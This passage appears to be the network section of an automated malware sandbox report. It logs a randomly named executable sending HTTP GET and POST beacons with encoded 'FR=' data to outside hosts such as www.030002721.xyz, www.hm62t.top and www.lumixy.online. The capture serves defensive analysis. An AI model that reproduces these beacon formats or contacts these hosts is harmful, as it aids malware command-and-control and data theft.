              Data Ascii: FR=Eno8gQNoB9YrfBwyo7xZ+xU4Z1dee5uUtiWxwsmbVzSzzvKZ3h0vASeUVmR86JX1zVa2vawcUx2+NryLKWYgA5Ta3fd4mtQ611UPOqAt+mNJy6z7vZir74IDE9QKZPJtn2ejEfvb5ZQ6i8T5TrqrNY5kupUfIpLGMoV8QzBqCkga4qbqA4h6GsvMF6xn0rm2Rjxgt4JJR+SHliLxo2sG0tMiEnJBZDQsbwwRioeL6n73oRVKLtSywcXP9npm7jO+BURUB2vMBUBvTg3krPbdLSthdrntduxxYnhG2RYtyOKcHrPfZLWfagRMEM4bE2CrAiH/EzNmGetJLafnlZnLlSEA57fMV6QpioxCd/A7ImvBWnFF7sjwzXQSIeFyQMOHIiHqXCjYlTBNgwEE21amzk7Sfdoue+ZPI6CpCapjcg15Z9CLhV4TLMmkRd+WbcBNqzoZKBGRCcrTf1NJtK7i2HBA3pnHuS798krIdLMyPPu7EwHPMoumBmPLyXIxUN5yYcpVTcDtdQzyAbKqCGwpZcRw7L8/UwUGLmkAo6uRjLBjzuHPz19DGLUOeUmU7JvAZa08GtP6d7jgLh37+vLyMyI9kxjfG2L2CIs7VLcd/NCcY9kFDRZabJWXeaqWhDsJ7m1+YoEFuWooR2wr1jwI8hJN1GGHy2J6yfUOP/GnNhnC+QZschpZLizaiE63p26ffCNy3D4seAfjUI37j/Bf5OW/BH83O5Ypz+YPEIuJ1jNFEouif7SydDnlw9Gae5qZDk2BZKr9nuu6V5NDTR901MtqlGWvyxfhwXwgpkSn2AGV/x4Mi28zaAm5OG4HqGVxS9WbkIkkGxmZQlzxrwvP0KLMF8tUgLKQ5ixabGxbgLca6vTYptnvcRLzUHLt00ttCk8kvitFO+emFZ4TFoSlOfFEj6aXj5LHDBt6/awUPPCbX8jcehBkdfFh4wHUjc4VkiB7Gaj3qekyQr8WIvgM69+suUx9O0rYVKwfxzMiLJC8HcJDz [TRUNCATED]
              Sep 6, 2024 09:06:05.778408051 CEST312INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:05 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.649744154.23.184.240805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:07.384383917 CEST527OUTGET /gd7t/?yXghy=KTox&FR=JlAcjlx2Gdg+DXM3i59+nmMFZHdISfOX/D3i1++YLzSS1YHv0m41CgGfSm0I/piMileZ/olvBUKxdIaFHHAoN7eK5KUeh7JInwAPNKMw/FJo5s/UjYShm5Z/UsIKNOFZiX+3bL8= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.hm62t.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:08.286851883 CEST312INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:08 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.64974565.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:21.509947062 CEST794OUTPOST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 58 45 42 52 57 67 71 52 4e 7a 34 48 2f 73 79 4f 52 2f 42 47 4b 6d 7a 78 77 56 66 2f 43 68 4f 68 79 66 66 30 56 76 42 58 45 59 6c 77 41 53 4c 67 65 69 74 68 70 4f 43 45 43 45 6c 56 7a 4a 61 30 36 78 45 48 4e 58 31 4a 67 52 39 44 55 73 73 63 58 66 59 50 45 63 4a 4b 64 70 31 48 63 6e 74 4d 52 59 71 66 46 78 46 42 6d 76 45 69 2f 52 67 31 44 57 59 70 76 73 70 74 77 78 39 42 69 56 31 5a 65 53 77 47 71 72 4e 79 69 66 37 67 74 71 65 45 6f 77 51 71 47 59 43 4e 79 76 50 51 39 69 46 51 44 4b 6d 48 47 43 41 55 58 59 47 58 56 7a 7a 44 4f 59 71 37 55 46 62 46 42 68 32 6a 4f 56 6e 30 6d 30 78 41 43 4a 48 41 65 37 2b 31
              Data Ascii: FR=XEBRWgqRNz4H/syOR/BGKmzxwVf/ChOhyff0VvBXEYlwASLgeithpOCECElVzJa06xEHNX1JgR9DUsscXfYPEcJKdp1HcntMRYqfFxFBmvEi/Rg1DWYpvsptwx9BiV1ZeSwGqrNyif7gtqeEowQqGYCNyvPQ9iFQDKmHGCAUXYGXVzzDOYq7UFbFBh2jOVn0m0xACJHAe7+1
              Sep 6, 2024 09:06:22.183772087 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:22 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.64974665.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:24.067521095 CEST818OUTPOST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 58 45 42 52 57 67 71 52 4e 7a 34 48 75 2f 36 4f 54 63 35 47 62 57 7a 32 38 31 66 2f 5a 52 4f 6c 79 66 6a 30 56 72 78 48 45 74 4e 77 42 7a 62 67 64 67 56 68 71 4f 43 45 61 55 6c 51 33 4a 61 2f 36 78 49 50 4e 57 5a 4a 67 52 35 44 55 6f 6b 63 55 73 77 4f 45 4d 4a 49 49 35 31 46 54 48 74 4d 52 59 71 66 46 78 52 72 6d 76 63 69 2f 43 34 31 44 30 67 71 6c 4d 70 75 33 78 39 42 6f 31 31 64 65 53 78 72 71 6f 49 76 69 63 44 67 74 76 69 45 72 69 34 70 4d 59 43 4c 38 50 4f 30 30 43 41 34 61 34 2f 6e 43 52 38 34 41 37 48 7a 51 46 79 5a 53 72 71 59 47 56 37 48 42 6a 75 52 4f 31 6e 65 6b 30 4a 41 51 65 4c 6e 52 50 62 57 65 72 52 6d 4b 38 70 52 31 77 37 55 43 76 53 54 6f 4a 39 64 63 67 3d 3d
              Data Ascii: FR=XEBRWgqRNz4Hu/6OTc5GbWz281f/ZROlyfj0VrxHEtNwBzbgdgVhqOCEaUlQ3Ja/6xIPNWZJgR5DUokcUswOEMJII51FTHtMRYqfFxRrmvci/C41D0gqlMpu3x9Bo11deSxrqoIvicDgtviEri4pMYCL8PO00CA4a4/nCR84A7HzQFyZSrqYGV7HBjuRO1nek0JAQeLnRPbWerRmK8pR1w7UCvSToJ9dcg==
              Sep 6, 2024 09:06:24.735851049 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:24 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.64974765.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:26.621428967 CEST1831OUTPOST /i28e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030002721.xyz
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030002721.xyz
              Referer: http://www.030002721.xyz/i28e/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 58 45 42 52 57 67 71 52 4e 7a 34 48 75 2f 36 4f 54 63 35 47 62 57 7a 32 38 31 66 2f 5a 52 4f 6c 79 66 6a 30 56 72 78 48 45 74 56 77 42 42 44 67 61 78 56 68 6b 75 43 45 45 45 6c 52 33 4a 61 69 36 78 67 4c 4e 57 46 7a 67 54 52 44 55 50 6b 63 56 64 77 4f 52 38 4a 49 51 4a 31 47 63 6e 74 6a 52 59 37 59 46 78 42 72 6d 76 63 69 2f 44 49 31 4b 47 59 71 6a 4d 70 74 77 78 39 33 69 56 31 31 65 57 63 65 71 70 39 59 69 74 6a 67 74 4c 2b 45 75 58 6b 70 52 6f 43 4a 73 66 4f 73 30 44 38 6e 61 34 7a 64 43 51 49 53 41 35 62 7a 51 77 4c 36 4c 6f 33 48 54 7a 2f 64 66 69 53 36 44 44 75 71 2b 45 74 37 65 4d 6e 4a 4d 4e 6a 76 59 50 4e 42 50 4f 38 67 2b 44 4f 2f 4a 37 33 6a 6e 5a 64 59 48 6e 68 45 67 34 30 37 51 52 55 35 62 6c 66 67 42 61 35 6a 6f 32 39 62 32 49 69 6b 46 71 77 4e 76 52 45 51 53 4e 66 66 34 66 67 61 59 4e 4c 63 54 61 43 77 4d 76 58 67 79 6c 76 31 57 72 70 77 33 47 74 47 31 4f 43 51 46 33 57 31 76 6a 31 4e 46 43 4d 57 36 41 63 59 33 2b 50 71 4b 6b 59 69 72 30 71 43 77 62 65 6a 6f 36 6f 43 45 67 45 [TRUNCATED]
              Data Ascii: FR=XEBRWgqRNz4Hu/6OTc5GbWz281f/ZROlyfj0VrxHEtVwBBDgaxVhkuCEEElR3Jai6xgLNWFzgTRDUPkcVdwOR8JIQJ1GcntjRY7YFxBrmvci/DI1KGYqjMptwx93iV11eWceqp9YitjgtL+EuXkpRoCJsfOs0D8na4zdCQISA5bzQwL6Lo3HTz/dfiS6DDuq+Et7eMnJMNjvYPNBPO8g+DO/J73jnZdYHnhEg407QRU5blfgBa5jo29b2IikFqwNvREQSNff4fgaYNLcTaCwMvXgylv1Wrpw3GtG1OCQF3W1vj1NFCMW6AcY3+PqKkYir0qCwbejo6oCEgEkgMKqj2suto66Ms9BmaF1bBnTOtr6OSbraWpRt752dQP7vR1Yy89wh2Iihwgw+31GNHIyDTiiHaCqTR8U4R1XqlPWJbdEOqOl/ZkpaD1xyzS2Lyfk2UTolnQzC/DxTOyTJVUwyZBR/q4PsY3+a+agHDaK5bPvNajfkBy/pk0t+U6o4AyMhZq2veSSpx0z3NTPueEYw8L16XQvfj0/jCi029wil5soNNFz/1TxeCaYmQdPJ+TFoUXHsD1oe+d9PNkYn6SlQWtJ1ZULDZpg/GG8wrPBJJuD2vhHCd3uU7cewPLtvEONB4Kg8cZ6ze8ZOnAKX7TrV64WDPJ35+ZrHnoBCrxaxqu12X1m95z9fdaOnTs7JCEgTQ2XO377BwhsPq9tH4upw1XPLb3GL6zBWKfWjM/IhM5yS8VmlgRTdQl99JArY6e1gSzncFzA9o6BGRtpHLuD5DsFRlqA+TBRQUcYpsTIT8aFQWtSc/64wJdNGUL5mQLGnsL33zocDRVbf9n3Q99m4gMIzfzI5rSKIbNuhqg913ZkfXH4E0fCh6mCMfvmSlhCnuaL5b4F2AbQEAsgx9Xqfx0cnm1nA9Np4C2LD5wUGLLYl7v3iac0IMJGfuQTI68NGWCwMrwAUj+lBye25NElY89XhB01EN0AaugoI2DgEWjG9yZNJ [TRUNCATED]
              Sep 6, 2024 09:06:27.322665930 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:27 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.64974865.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:29.164484978 CEST531OUTGET /i28e/?yXghy=KTox&FR=aGpxVX6kGAU+vZyZZfJTCDz7/lPsBFWDos3dY6ZsNYZMPz7BIFF7kPeLI34j35LFjHkoTmJm1HUVC8sGZtVHFfldRMYhCGprZu/MBi0oweQaoGEXOF433+gvsUsQ2wF2VEo07O8= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.030002721.xyz
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:29.840902090 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:06:29 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.649749184.94.212.115805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:34.933149099 CEST794OUTPOST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 70 64 59 7a 33 76 31 58 4c 75 48 4c 4e 44 73 35 6d 56 2b 78 46 58 56 31 6d 6e 71 46 56 58 4a 66 4e 5a 6e 79 44 56 7a 4f 71 4b 63 34 67 30 43 4d 69 72 62 6c 55 38 41 79 69 34 72 44 65 44 64 7a 70 4d 2f 59 57 37 79 64 4f 2b 43 42 36 44 44 4a 77 33 79 64 47 49 77 7a 50 79 79 54 4e 35 63 4c 6d 77 34 50 55 33 58 73 75 59 44 69 30 44 79 50 4e 77 56 2f 58 6e 35 52 53 6a 38 71 36 2b 73 45 6b 55 38 71 42 49 77 2b 45 45 34 50 32 43 76 55 48 6e 32 4c 41 50 53 6d 64 59 4c 35 52 49 61 4b 41 33 75 48 44 39 49 65 35 53 6d 37 7a 64 53 34 46 37 42 75 61 73 69 4f 69 72 38 7a 72 38 69 4e 6d 35 54 67 7a 58 71 66 58 6b 49 43
              Data Ascii: FR=pdYz3v1XLuHLNDs5mV+xFXV1mnqFVXJfNZnyDVzOqKc4g0CMirblU8Ayi4rDeDdzpM/YW7ydO+CB6DDJw3ydGIwzPyyTN5cLmw4PU3XsuYDi0DyPNwV/Xn5RSj8q6+sEkU8qBIw+EE4P2CvUHn2LAPSmdYL5RIaKA3uHD9Ie5Sm7zdS4F7BuasiOir8zr8iNm5TgzXqfXkIC
              Sep 6, 2024 09:06:35.510173082 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:35 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 